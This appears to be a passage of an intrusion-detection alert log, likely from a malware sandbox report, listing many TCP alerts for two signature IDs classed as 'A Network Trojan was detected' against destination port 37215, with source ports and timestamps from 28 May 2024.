          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975012
          SID:2829579
          Source Port:47540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.319130
          SID:2829579
          Source Port:60136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298847
          SID:2835222
          Source Port:42160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462916
          SID:2835222
          Source Port:43478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.075521
          SID:2835222
          Source Port:47340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205476
          SID:2835222
          Source Port:48748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743676
          SID:2835222
          Source Port:57946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048555
          SID:2835222
          Source Port:55626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437508
          SID:2829579
          Source Port:50342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807882
          SID:2835222
          Source Port:34328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.471171
          SID:2835222
          Source Port:48550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.715213
          SID:2829579
          Source Port:52520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923286
          SID:2835222
          Source Port:51640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.230315
          SID:2835222
          Source Port:60732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170907
          SID:2835222
          Source Port:34662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328865
          SID:2829579
          Source Port:53880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061855
          SID:2829579
          Source Port:52048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196595
          SID:2829579
          Source Port:53468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336653
          SID:2829579
          Source Port:53720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464407
          SID:2829579
          Source Port:45978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795108
          SID:2835222
          Source Port:43758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592971
          SID:2829579
          Source Port:47886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336928
          SID:2829579
          Source Port:36406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197765
          SID:2835222
          Source Port:54788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959294
          SID:2835222
          Source Port:39256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.235989
          SID:2829579
          Source Port:53038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.665160
          SID:2835222
          Source Port:44262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.151485
          SID:2829579
          Source Port:34344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207054
          SID:2835222
          Source Port:46898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.113030
          SID:2829579
          Source Port:44024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.113239
          SID:2829579
          Source Port:41314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.424309
          SID:2835222
          Source Port:58524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210551
          SID:2835222
          Source Port:55322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.238166
          SID:2835222
          Source Port:35742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549451
          SID:2835222
          Source Port:58510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742444
          SID:2835222
          Source Port:36002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466158
          SID:2835222
          Source Port:41442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669123
          SID:2829579
          Source Port:58988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.305034
          SID:2829579
          Source Port:53004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483121
          SID:2829579
          Source Port:53152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125863
          SID:2829579
          Source Port:48742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464316
          SID:2829579
          Source Port:52920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195115
          SID:2835222
          Source Port:53970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326828
          SID:2835222
          Source Port:54968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267920
          SID:2835222
          Source Port:32966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771478
          SID:2829579
          Source Port:46962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973860
          SID:2835222
          Source Port:47608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.151294
          SID:2829579
          Source Port:46204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.301377
          SID:2829579
          Source Port:49996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211430
          SID:2835222
          Source Port:32992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.816820
          SID:2835222
          Source Port:54526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.226291
          SID:2829579
          Source Port:45114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.980669
          SID:2829579
          Source Port:37014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334190
          SID:2829579
          Source Port:60616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.557259
          SID:2835222
          Source Port:58036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542256
          SID:2835222
          Source Port:44518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943341
          SID:2829579
          Source Port:54262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300630
          SID:2829579
          Source Port:55198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774641
          SID:2835222
          Source Port:53088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.552756
          SID:2835222
          Source Port:43948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.223289
          SID:2829579
          Source Port:55636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299309
          SID:2835222
          Source Port:45706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.628446
          SID:2835222
          Source Port:57460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.119213
          SID:2829579
          Source Port:58650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977375
          SID:2835222
          Source Port:46166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400476
          SID:2835222
          Source Port:58052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711531
          SID:2829579
          Source Port:52250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.680272
          SID:2829579
          Source Port:39710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543615
          SID:2829579
          Source Port:50586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357223
          SID:2835222
          Source Port:35660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.801868
          SID:2835222
          Source Port:58606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548552
          SID:2829579
          Source Port:43222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.212669
          SID:2835222
          Source Port:43556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210728
          SID:2829579
          Source Port:52232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.317039
          SID:2829579
          Source Port:45286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474634
          SID:2835222
          Source Port:45526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.924213
          SID:2835222
          Source Port:40022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893378
          SID:2829579
          Source Port:39230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543265
          SID:2829579
          Source Port:33464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.277002
          SID:2835222
          Source Port:39218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211688
          SID:2829579
          Source Port:39624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806827
          SID:2835222
          Source Port:42380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818096
          SID:2835222
          Source Port:43774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464457
          SID:2835222
          Source Port:41688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.288143
          SID:2829579
          Source Port:43208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.636604
          SID:2829579
          Source Port:47898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.278298
          SID:2829579
          Source Port:59538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195450
          SID:2829579
          Source Port:42114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115450
          SID:2829579
          Source Port:57036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401479
          SID:2829579
          Source Port:50088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892843
          SID:2835222
          Source Port:43654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341245
          SID:2835222
          Source Port:44630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839826
          SID:2829579
          Source Port:60438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177196
          SID:2829579
          Source Port:53686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782801
          SID:2835222
          Source Port:55840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.311197
          SID:2835222
          Source Port:55168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738450
          SID:2835222
          Source Port:50952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849286
          SID:2835222
          Source Port:50626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.990652
          SID:2829579
          Source Port:56424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033347
          SID:2829579
          Source Port:46380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156249
          SID:2835222
          Source Port:39752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963762
          SID:2835222
          Source Port:59666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838605
          SID:2829579
          Source Port:59798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511296
          SID:2829579
          Source Port:54852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963974
          SID:2829579
          Source Port:55616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.276229
          SID:2835222
          Source Port:39984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403252
          SID:2835222
          Source Port:56862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298846
          SID:2835222
          Source Port:59750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978270
          SID:2835222
          Source Port:52430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667843
          SID:2835222
          Source Port:53658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474543
          SID:2829579
          Source Port:56080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299740
          SID:2829579
          Source Port:59358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154321
          SID:2835222
          Source Port:40368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268590
          SID:2829579
          Source Port:51268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.860394
          SID:2835222
          Source Port:39900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669263
          SID:2835222
          Source Port:40674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681625
          SID:2829579
          Source Port:36150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325737
          SID:2829579
          Source Port:40704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272747
          SID:2835222
          Source Port:51066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.804628
          SID:2835222
          Source Port:34400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441915
          SID:2835222
          Source Port:56098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357042
          SID:2835222
          Source Port:53716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146155
          SID:2829579
          Source Port:38100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221538
          SID:2835222
          Source Port:57388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.914203
          SID:2829579
          Source Port:39172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156884
          SID:2829579
          Source Port:39390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593091
          SID:2835222
          Source Port:37694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877677
          SID:2829579
          Source Port:38356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.215193
          SID:2829579
          Source Port:33404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.222216
          SID:2835222
          Source Port:49110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.034028
          SID:2829579
          Source Port:49320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176027
          SID:2835222
          Source Port:39920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266262
          SID:2829579
          Source Port:52644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295049
          SID:2829579
          Source Port:60736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.432967
          SID:2829579
          Source Port:52538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266648
          SID:2829579
          Source Port:34276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635212
          SID:2829579
          Source Port:40774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797874
          SID:2829579
          Source Port:42560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.225773
          SID:2835222
          Source Port:41884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.662642
          SID:2835222
          Source Port:59122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.063912
          SID:2829579
          Source Port:53804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.864215
          SID:2829579
          Source Port:53232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547309
          SID:2829579
          Source Port:49310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322286
          SID:2829579
          Source Port:34210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441464
          SID:2835222
          Source Port:46372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140102
          SID:2829579
          Source Port:35974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112946
          SID:2835222
          Source Port:37104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667405
          SID:2835222
          Source Port:56896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591113
          SID:2829579
          Source Port:52470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735772
          SID:2835222
          Source Port:57354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.314571
          SID:2829579
          Source Port:39164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.145341
          SID:2835222
          Source Port:59830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741825
          SID:2829579
          Source Port:49226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.438183
          SID:2835222
          Source Port:44226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209021
          SID:2829579
          Source Port:60540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.994898
          SID:2829579
          Source Port:60692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959901
          SID:2835222
          Source Port:34710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183670
          SID:2835222
          Source Port:36076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369081
          SID:2829579
          Source Port:54276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891118
          SID:2835222
          Source Port:48834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213736
          SID:2829579
          Source Port:54290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892648
          SID:2835222
          Source Port:54852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946909
          SID:2835222
          Source Port:49610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946620
          SID:2829579
          Source Port:48626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681604
          SID:2835222
          Source Port:52794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709041
          SID:2829579
          Source Port:49888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529048
          SID:2829579
          Source Port:50616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815308
          SID:2829579
          Source Port:58864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.975968
          SID:2829579
          Source Port:46844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547548
          SID:2829579
          Source Port:55586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651334
          SID:2835222
          Source Port:53804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922727
          SID:2829579
          Source Port:49590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476450
          SID:2835222
          Source Port:39282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480944
          SID:2835222
          Source Port:52806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592053
          SID:2829579
          Source Port:53818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.927699
          SID:2829579
          Source Port:46594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549488
          SID:2835222
          Source Port:55382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483094
          SID:2835222
          Source Port:55032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525378
          SID:2835222
          Source Port:55410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.634079
          SID:2829579
          Source Port:58394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756369
          SID:2835222
          Source Port:43984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.487367
          SID:2835222
          Source Port:45570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.623118
          SID:2829579
          Source Port:53890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728449
          SID:2835222
          Source Port:51336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726791
          SID:2829579
          Source Port:41700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681209
          SID:2835222
          Source Port:56170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143090
          SID:2829579
          Source Port:34140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.307774
          SID:2829579
          Source Port:41578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975449
          SID:2835222
          Source Port:34598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.805070
          SID:2835222
          Source Port:41852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941528
          SID:2835222
          Source Port:58990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778922
          SID:2829579
          Source Port:56436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161339
          SID:2835222
          Source Port:38026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223105
          SID:2829579
          Source Port:55780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103265
          SID:2829579
          Source Port:34696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669060
          SID:2835222
          Source Port:58494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201694
          SID:2829579
          Source Port:58722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
